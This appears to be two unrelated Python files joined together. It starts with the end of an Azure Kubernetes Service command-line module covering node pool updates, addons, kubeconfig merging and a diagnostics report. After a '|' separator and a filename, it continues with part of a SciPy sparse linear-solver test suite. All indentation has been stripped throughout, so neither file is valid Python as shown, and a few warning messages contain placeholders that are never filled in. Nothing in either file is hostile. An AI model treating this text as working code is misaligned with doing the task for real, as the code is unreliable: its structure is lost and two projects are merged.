return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
kubernetes_version,
nodepool_name,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_update(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
mode=None,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
if (update_autoscaler != 1 and not tags and not mode):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
node_count = instance.count
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specifying both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError('value of min-count should be less than or equal to value of max-count.')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError("current node count '{}' is not in the range of min-count and max-count.".format(node_count))
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning('Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if mode is not None:
instance.mode = mode
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.delete, resource_group_name, cluster_name, nodepool_name)
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_id=None, appgw_subnet_id=None, appgw_shared=False, appgw_watch_namespace=None, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
service_principal_client_id = instance.service_principal_profile.client_id
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id, subnet_name=subnet_name,
appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id, appgw_shared=appgw_shared, appgw_watch_namespace=appgw_watch_namespace, no_wait=no_wait)
if 'omsagent' in instance.addon_profiles and instance.addon_profiles['omsagent'].enabled:
_ensure_container_insights_for_monitoring(cmd, instance.addon_profiles['omsagent'])
if CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles:
if CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID in instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config:
appgw_id = instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID]
from msrestazure.tools import parse_resource_id, resource_id
appgw_id_dict = parse_resource_id(appgw_id)
appgw_group_id = resource_id(subscription=appgw_id_dict["subscription"], resource_group=appgw_id_dict["resource_group"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_client_id, scope=appgw_group_id):
logger.warning('Could not create a role assignment for application gateway: {appgw_id} '
'specified in {CONST_INGRESS_APPGW_ADDON_NAME} addon. '
'Are you an Owner on this subscription?')
if CONST_INGRESS_APPGW_SUBNET_ID in instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config:
subnet_id = instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config[CONST_INGRESS_APPGW_SUBNET_ID]
from msrestazure.tools import parse_resource_id, resource_id
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_client_id, scope=subnet_id):
logger.warning('Could not create a role assignment for subnet: {subnet_id} '
'specified in {CONST_INGRESS_APPGW_ADDON_NAME} addon. '
'Are you an Owner on this subscription?')
if 'omsagent' in instance.addon_profiles and instance.addon_profiles['omsagent'].enabled:
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(resource_group_name, name, instance))
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(result, cluster_resource_id, cmd)
else:
result = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name, name, instance)
return result
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True): # pylint: disable=unused-argument
return sdk_no_wait(no_wait, client.rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, # pylint: disable=too-many-branches,too-many-statements
instance,
subscription_id,
resource_group_name,
name,
addons,
enable,
workspace_resource_id=None,
subnet_name=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_shared=False,
appgw_watch_namespace=None,
no_wait=False): # pylint: disable=unused-argument
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
if 'kube-dashboard' in addon_args and 'kubeDashboard' not in addon_profiles:
addon_profiles['kubeDashboard'] = ManagedClusterAddonProfile(enabled=True)
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
addon = ADDONS[addon_arg]
if addon == 'aciConnector':
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# addon name is case insensitive
addon = next((x for x in addon_profiles.keys() if x.lower() == addon.lower()), addon)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == 'omsagent':
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {'logAnalyticsWorkspaceResourceID': workspace_resource_id}
elif addon.lower() == ('aciConnector' + os_type).lower():
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError('The aci-connector addon requires setting a subnet name.')
addon_profile.config = {'SubnetName': subnet_name}
elif addon.lower() == CONST_INGRESS_APPGW_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_PREFIX] = appgw_subnet_prefix
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_shared:
addon_profile.config[CONST_INGRESS_APPGW_SHARED] = "true"
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
raise CLIError("The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def aks_get_versions(cmd, client, location): # pylint: disable=unused-argument
return client.list_orchestrators(location, resource_type='managedClusters')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning('Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _handle_merge(existing, addition, key, replace):
if not addition[key]:
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
from knack.prompting import prompt_y_n
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if addition is None:
raise CLIError('failed to load additional configuration from {}'.format(addition_file))
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file)
print(msg)
def cloud_storage_account_service_factory(cli_ctx, kwargs):
from azure.cli.core.profiles import ResourceType, get_sdk
t_cloud_storage_account = get_sdk(cli_ctx, ResourceType.DATA_STORAGE, 'common#CloudStorageAccount')
account_name = kwargs.pop('account_name', None)
account_key = kwargs.pop('account_key', None)
sas_token = kwargs.pop('sas_token', None)
kwargs.pop('connection_string', None)
return t_cloud_storage_account(account_name, account_key, sas_token)
def get_storage_account_from_diag_settings(cli_ctx, resource_group_name, name):
from azure.mgmt.monitor import MonitorManagementClient
diag_settings_client = get_mgmt_service_client(cli_ctx, MonitorManagementClient).diagnostic_settings
subscription_id = get_subscription_id(cli_ctx)
aks_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService' \
'/managedClusters/{2}'.format(subscription_id, resource_group_name, name)
diag_settings = diag_settings_client.list(aks_resource_id)
if diag_settings.value:
return diag_settings.value[0].storage_account_id
print("No diag settings specified")
return None
def display_diagnostics_report(temp_kubeconfig_path): # pylint: disable=too-many-statements
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
nodes = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get", "node", "--no-headers"],
universal_newlines=True)
logger.debug(nodes)
node_lines = nodes.splitlines()
ready_nodes = {}
for node_line in node_lines:
columns = node_line.split()
logger.debug(node_line)
if columns[1] != "Ready":
logger.warning("Node %s is not Ready. Current state is: %s.", columns[0], columns[1])
else:
ready_nodes[columns[0]] = False
logger.debug('There are %s ready nodes in the cluster', str(len(ready_nodes)))
if not ready_nodes:
logger.warning('No nodes are ready in the current cluster. Diagnostics info might not be available.')
network_config_array = []
network_status_array = []
apds_created = False
max_retry = 10
for retry in range(0, max_retry):
if not apds_created:
apd = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get", "apd", "-n", "aks-periscope", "--no-headers"],
universal_newlines=True
)
apd_lines = apd.splitlines()
if apd_lines and 'No resources found' in apd_lines[0]:
apd_lines.pop(0)
print("Got {} diagnostic results for {} ready nodes{}\r".format(len(apd_lines),
len(ready_nodes),
'.' * retry), end='')
if len(apd_lines) < len(ready_nodes):
time.sleep(3)
else:
apds_created = True
print()
else:
for node_name in ready_nodes:
if ready_nodes[node_name]:
continue
apdName = "aks-periscope-diagnostic-" + node_name
try:
network_config = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkconfig}"],
universal_newlines=True)
logger.debug('Dns status for node %s is %s', node_name, network_config)
network_status = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkoutbound}"],
universal_newlines=True)
logger.debug('Network status for node %s is %s', node_name, network_status)
if not network_config or not network_status:
print("The diagnostics information for node {} is not ready yet. "
"Will try again in 10 seconds.".format(node_name))
time.sleep(10)
break
network_config_array += json.loads('[' + network_config + ']')
network_status_object = json.loads(network_status)
network_status_array += format_diag_status(network_status_object)
ready_nodes[node_name] = True
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
print()
if network_config_array:
print("Below are the network configuration for each node: ")
print()
print(tabulate(network_config_array, headers="keys", tablefmt='simple'))
print()
else:
logger.warning("Could not get network config. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
if network_status_array:
print("Below are the network connectivity results for each node:")
print()
print(tabulate(network_status_array, headers="keys", tablefmt='simple'))
else:
logger.warning("Could not get networking status. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
def format_diag_status(diag_status):
for diag in diag_status:
if diag["Status"]:
if "Error:" in diag["Status"]:
diag["Status"] = f'{colorama.Fore.RED}{diag["Status"]}{colorama.Style.RESET_ALL}'
else:
diag["Status"] = f'{colorama.Fore.GREEN}{diag["Status"]}{colorama.Style.RESET_ALL}'
return diag_status
def format_bright(msg):
return f'\033[1m{colorama.Style.BRIGHT}{msg}{colorama.Style.RESET_ALL}'
def format_hyperlink(the_link):
return f'\033[1m{colorama.Style.BRIGHT}{colorama.Fore.BLUE}{the_link}{colorama.Style.RESET_ALL}'
|
test_linsolve.py
|
from __future__ import division, print_function, absolute_import
import threading
import numpy as np
from numpy import array, finfo, arange, eye, all, unique, ones, dot, matrix
import numpy.random as random
from numpy.testing import (
assert_array_almost_equal, assert_raises, assert_almost_equal,
assert_equal, assert_array_equal, assert_, assert_allclose,
assert_warns)
import pytest
from scipy._lib._numpy_compat import assert_raises_regex
import scipy.linalg
from scipy.linalg import norm, inv
from scipy.sparse import (spdiags, SparseEfficiencyWarning, csc_matrix,
csr_matrix, identity, isspmatrix, dok_matrix, lil_matrix, bsr_matrix)
from scipy.sparse.linalg import SuperLU
from scipy.sparse.linalg.dsolve import (spsolve, use_solver, splu, spilu,
MatrixRankWarning, _superlu, spsolve_triangular, factorized)
from scipy._lib._numpy_compat import suppress_warnings
sup_sparse_efficiency = suppress_warnings()
sup_sparse_efficiency.filter(SparseEfficiencyWarning)
# scikits.umfpack is not a SciPy dependency but it is optionally used in
# dsolve, so check whether it's available
try:
import scikits.umfpack as umfpack
has_umfpack = True
except ImportError:
has_umfpack = False
def toarray(a):
if isspmatrix(a):
return a.toarray()
else:
return a
class TestFactorized(object):
def setup_method(self):
n = 5
d = arange(n) + 1
self.n = n
self.A = spdiags((d, 2*d, d[::-1]), (-3, 0, 5), n, n).tocsc()
random.seed(1234)
def _check_singular(self):
A = csc_matrix((5,5), dtype='d')
b = ones(5)
assert_array_almost_equal(0. * b, factorized(A)(b))
def _check_non_singular(self):
# Make a diagonal dominant, to make sure it is not singular
n = 5
a = csc_matrix(random.rand(n, n))
b = ones(n)
expected = splu(a).solve(b)
assert_array_almost_equal(factorized(a)(b), expected)
def test_singular_without_umfpack(self):
use_solver(useUmfpack=False)
assert_raises_regex(RuntimeError, "Factor is exactly singular", self._check_singular)
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_singular_with_umfpack(self):
use_solver(useUmfpack=True)
with suppress_warnings() as sup:
sup.filter(RuntimeWarning, "divide by zero encountered in double_scalars")
assert_warns(umfpack.UmfpackWarning, self._check_singular)
def test_non_singular_without_umfpack(self):
use_solver(useUmfpack=False)
self._check_non_singular()
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_non_singular_with_umfpack(self):
use_solver(useUmfpack=True)
self._check_non_singular()
def test_cannot_factorize_nonsquare_matrix_without_umfpack(self):
use_solver(useUmfpack=False)
assert_raises_regex(ValueError, "can only factor square matrices",
factorized, self.A[:,:4])
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_factorizes_nonsquare_matrix_with_umfpack(self):
use_solver(useUmfpack=True)
# does not raise
factorized(self.A[:,:4])
def test_call_with_incorrectly_sized_matrix_without_umfpack(self):
use_solver(useUmfpack=False)
solve = factorized(self.A)
b = random.rand(4)
B = random.rand(4, 3)
BB = random.rand(self.n, 3, 9)
assert_raises_regex(ValueError, "is of incompatible size", solve, b)
assert_raises_regex(ValueError, "is of incompatible size", solve, B)
assert_raises_regex(ValueError, "object too deep for desired array", solve, BB)
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_call_with_incorrectly_sized_matrix_with_umfpack(self):
use_solver(useUmfpack=True)
solve = factorized(self.A)
b = random.rand(4)
B = random.rand(4, 3)
BB = random.rand(self.n, 3, 9)
# does not raise
solve(b)
assert_raises_regex(ValueError, "object too deep for desired array", solve, B)
assert_raises_regex(ValueError, "object too deep for desired array", solve, BB)
def test_call_with_cast_to_complex_without_umfpack(self):
use_solver(useUmfpack=False)
solve = factorized(self.A)
b = random.rand(4)
for t in [np.complex64, np.complex128]:
assert_raises_regex(TypeError, "Cannot cast array data", solve,
b.astype(t))
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_call_with_cast_to_complex_with_umfpack(self):
use_solver(useUmfpack=True)
solve = factorized(self.A)
b = random.rand(4)
for t in [np.complex64, np.complex128]:
assert_warns(np.ComplexWarning, solve, b.astype(t))
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_assume_sorted_indices_flag(self):
# a sparse matrix with unsorted indices
unsorted_inds = np.array([2, 0, 1, 0])
data = np.array([10, 16, 5, 0.4])
indptr = np.array([0, 1, 2, 4])
A = csc_matrix((data, unsorted_inds, indptr), (3, 3))
b = ones(3)
# should raise when incorrectly assuming indices are sorted
use_solver(useUmfpack=True, assumeSortedIndices=True)
assert_raises_regex(RuntimeError, "UMFPACK_ERROR_invalid_matrix", factorized, A)
# should sort indices and succeed when not assuming indices are sorted
use_solver(useUmfpack=True, assumeSortedIndices=False)
expected = splu(A.copy()).solve(b)
assert_equal(A.has_sorted_indices, 0)
assert_array_almost_equal(factorized(A)(b), expected)
assert_equal(A.has_sorted_indices, 1)
class TestLinsolve(object):
def setup_method(self):
use_solver(useUmfpack=False)
def test_singular(self):
A = csc_matrix((5,5), dtype='d')
b = array([1, 2, 3, 4, 5],dtype='d')
with suppress_warnings() as sup:
sup.filter(MatrixRankWarning, "Matrix is exactly singular")
x = spsolve(A, b)
assert_(not np.isfinite(x).any())
def test_singular_gh_3312(self):
# "Bad" test case that leads SuperLU to call LAPACK with invalid
# arguments. Check that it fails moderately gracefully.
ij = np.array([(17, 0), (17, 6), (17, 12), (10, 13)], dtype=np.int32)
v = np.array([0.284213, 0.94933781, 0.15767017, 0.38797296])
A = csc_matrix((v, ij.T), shape=(20, 20))
b = np.arange(20)
try:
# should either raise a runtimeerror or return value
# appropriate for singular input
x = spsolve(A, b)
assert_(not np.isfinite(x).any())
except RuntimeError:
pass
def test_twodiags(self):
A = spdiags([[1, 2, 3, 4, 5], [6, 5, 8, 9, 10]], [0, 1], 5, 5)
b = array([1, 2, 3, 4, 5])
# condition number of A
cond_A = norm(A.todense(),2) * norm(inv(A.todense()),2)
for t in ['f','d','F','D']:
eps = finfo(t).eps # floating point epsilon
b = b.astype(t)
for format in ['csc','csr']:
Asp = A.astype(t).asformat(format)
x = spsolve(Asp,b)
assert_(norm(b - Asp*x) < 10 * cond_A * eps)
def test_bvector_smoketest(self):
Adense = matrix([[0., 1., 1.],
[1., 0., 1.],
[0., 0., 1.]])
As = csc_matrix(Adense)
random.seed(1234)
x = random.randn(3)
b = As*x
x2 = spsolve(As, b)
assert_array_almost_equal(x, x2)
def test_bmatrix_smoketest(self):
Adense = matrix([[0., 1., 1.],
[1., 0., 1.],
[0., 0., 1.]])
As = csc_matrix(Adense)
random.seed(1234)
x = random.randn(3, 4)
Bdense = As.dot(x)
Bs = csc_matrix(Bdense)
x2 = spsolve(As, Bs)
assert_array_almost_equal(x, x2.todense())
@sup_sparse_efficiency
def test_non_square(self):
# A is not square.
A = ones((3, 4))
b = ones((4, 1))
assert_raises(ValueError, spsolve, A, b)
# A2 and b2 have incompatible shapes.
A2 = csc_matrix(eye(3))
b2 = array([1.0, 2.0])
assert_raises(ValueError, spsolve, A2, b2)
@sup_sparse_efficiency
def test_example_comparison(self):
row = array([0,0,1,2,2,2])
col = array([0,2,2,0,1,2])
data = array([1,2,3,-4,5,6])
sM = csr_matrix((data,(row,col)), shape=(3,3), dtype=float)
M = sM.todense()
row = array([0,0,1,1,0,0])
col = array([0,2,1,1,0,0])
data = array([1,1,1,1,1,1])
sN = csr_matrix((data, (row,col)), shape=(3,3), dtype=float)
N = sN.todense()
sX = spsolve(sM, sN)
X = scipy.linalg.solve(M, N)
assert_array_almost_equal(X, sX.todense())
@sup_sparse_efficiency
@pytest.mark.skipif(not has_umfpack, reason="umfpack not available")
def test_shape_compatibility(self):
use_solver(useUmfpack=True)
A = csc_matrix([[1., 0], [0, 2]])
bs = [
[1, 6],
array([1, 6]),
[[1], [6]],
array([[1], [6]]),
csc_matrix([[1], [6]]),
csr_matrix([[1], [6]]),
dok_matrix([[1], [6]]),
bsr_matrix([[1], [6]]),
array([[1., 2., 3.], [6., 8., 10.]]),
csc_matrix([[1., 2., 3.], [6., 8., 10.]]),
csr_matrix([[1., 2., 3.], [6., 8., 10.]]),
dok_matrix([[1., 2., 3.], [6., 8., 10.]]),
bsr_matrix([[1., 2., 3.], [6., 8., 10.]]),
]
for b in bs:
x = np.linalg.solve(A.toarray(), toarray(b))
for spmattype in [csc_matrix, csr_matrix, dok_matrix, lil_matrix]:
x1 = spsolve(spmattype(A), b, use_umfpack=True)
x2 = spsolve(spmattype(A), b, use_umfpack=False)
# check solution
if x.ndim == 2 and x.shape[1] == 1:
# interprets also these as "vectors"
x = x.ravel()
assert_array_almost_equal(toarray(x1), x, err_msg=repr((b, spmattype, 1)))
assert_array_almost_equal(toarray(x2), x, err_msg=repr((b, spmattype, 2)))
# dense vs. sparse output ("vectors" are always dense)
if isspmatrix(b) and x.ndim > 1:
assert_(isspmatrix(x1), repr((b, spmattype, 1)))
assert_(isspmatrix(x2), repr((b, spmattype, 2)))
else:
assert_(isinstance(x1, np.ndarray), repr((b, spmattype, 1)))
assert_(isinstance(x2, np.ndarray), repr((b, spmattype, 2)))
# check output shape
if x.ndim == 1:
# "vector"
assert_equal(x1.shape, (A.shape[1],))
assert_equal(x2.shape, (A.shape[1],))
else:
# "matrix"
assert_equal(x1.shape, x.shape)
assert_equal(x2.shape, x.shape)
A = csc_matrix((3, 3))
b = csc_matrix((1, 3))
assert_raises(ValueError, spsolve, A, b)
@sup_sparse_efficiency
def test_ndarray_support(self):
A = array([[1., 2.], [2., 0.]])
x = array([[1., 1.], [0.5, -0.5]])
b = array([[2., 0.], [2., 2.]])
assert_array_almost_equal(x, spsolve(A, b))
def test_gssv_badinput(self):
N = 10
d = arange(N) + 1.0
A = spdiags((d, 2*d, d[::-1]), (-3, 0, 5), N, N)
for spmatrix in (csc_matrix, csr_matrix):
A = spmatrix(A)
b = np.arange(N)
def not_c_contig(x):
return x.repeat(2)[::2]
def not_1dim(x):
return x[:,None]
def bad_type(x):
return x.astype(bool)
def too_short(x):
return x[:-1]
badops = [not_c_contig, not_1dim, bad_type, too_short]
for badop in badops:
msg = "%r %r" % (spmatrix, badop)
# Not C-contiguous
assert_raises((ValueError, TypeError), _superlu.gssv,
N, A.nnz, badop(A.data), A.indices, A.indptr,
b, int(spmatrix == csc_matrix), err_msg=msg)
assert_raises((ValueError, TypeError), _superlu.gssv,
N, A.nnz, A.data, badop(A.indices), A.indptr,
b, int(spmatrix == csc_matrix), err_msg=msg)
assert_raises((ValueError, TypeError), _superlu.gssv,
N, A.nnz, A.data, A.indices, badop(A.indptr),
b, int(spmatrix == csc_matrix), err_msg=msg)
def test_sparsity_preservation(self):
ident = csc_matrix([
[1, 0, 0],
[0, 1, 0],
[0, 0, 1]])
b = csc_matrix([
[0, 1],
[1, 0],
[0, 0]])
x = spsolve(ident, b)
assert_equal(ident.nnz, 3)
assert_equal(b.nnz, 2)
assert_equal(x.nnz, 2)
assert_allclose(x.A, b.A, atol=1e-12, rtol=1e-12)
def test_dtype_cast(self):
A_real = scipy.sparse.csr_matrix([[1, 2, 0],
[0, 0, 3],
[4, 0, 5]])
A_complex = scipy.sparse.csr_matrix([[1, 2, 0],
[0, 0, 3],
[4, 0, 5 + 1j]])
b_real = np.array([1,1,1])
b_complex = np.array([1,1,1]) + 1j*np.array([1,1,1])
x = spsolve(A_real, b_real)
assert_(np.issubdtype(x.dtype, np.floating))
x = spsolve(A_real, b_complex)
assert_(np.issubdtype(x.dtype, np.complexfloating))
x = spsolve(A_complex, b_real)
assert_(np.issubdtype(x.dtype, np.complexfloating))
x = spsolve(A_complex, b_complex)
assert_(np.issubdtype(x.dtype, np.complexfloating))
class TestSplu(object):
def setup_method(self):
use_solver(useUmfpack=False)
n = 40
d = arange(n) + 1
self.n = n
self.A = spdiags((d, 2*d, d[::-1]), (-3, 0, 5), n, n)
random.seed(1234)
def _smoketest(self, spxlu, check, dtype):
if np.issubdtype(dtype, np.complexfloating):
A = self.A + 1j*self.A.T
else:
A = self.A
A = A.astype(dtype)
lu = spxlu(A)
rng = random.RandomState(1234)
# Input shapes
for k in [None, 1, 2, self.n, self.n+2]:
msg = "k=%r" % (k,)
if k is None:
b = rng.rand(self.n)
else:
b = rng.rand(self.n, k)
if np.issubdtype(dtype, np.complexfloating):
b = b + 1j*rng.rand(*b.shape)
b = b.astype(dtype)
x = lu.solve(b)
check(A, b, x, msg)
x = lu.solve(b, 'T')
check(A.T, b, x, msg)
x = lu.solve(b, 'H')
check(A.T.conj(), b, x, msg)
@sup_sparse_efficiency
def test_splu_smoketest(self):
self._internal_test_splu_smoketest()
def _internal_test_splu_smoketest(self):
# Check that splu works at all
def check(A, b, x, msg=""):
eps = np.finfo(A.dtype).eps
r = A * x
assert_(abs(r - b).max() < 1e3*eps, msg)
self._smoketest(splu, check, np.float32)
self._smoketest(splu, check, np.float64)
